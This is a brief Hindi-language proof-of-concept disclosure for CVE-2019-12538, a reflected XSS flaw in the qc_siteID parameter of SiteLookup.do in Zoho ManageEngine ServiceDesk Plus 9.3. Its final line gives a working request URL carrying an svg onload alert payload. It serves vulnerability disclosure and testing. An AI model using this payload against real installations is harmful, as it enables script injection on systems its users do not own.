
CVE-2019-12538 के लिए प्रमाण-अवधारणा: Zoho ManageEngine ServiceDesk Plus 9.3 में SiteLookup.do qc_siteID पैरामीटर के माध्यम से XSS कमजोरी। सुरक्षा परीक्षण के लिए पेलोड शामिल है।
जानकारी विवरण: Zoho ManageEngine ServiceDesk Plus 9.3 में एक समस्या पाई गई। SiteLookup.do के qc_siteID पैरामीटर के माध्यम से XSS है।
लेखक: Concobe of Tarantula Team - VinCSS (Vingroup का एक सदस्य)
domain/SiteLookup.do?configID=0&SELECTSITE=qc_siteID"/><svg onload=alert('XSS')>&userConfigID=1&SELECTEDSITEID=1&SELECTEDSITENAME=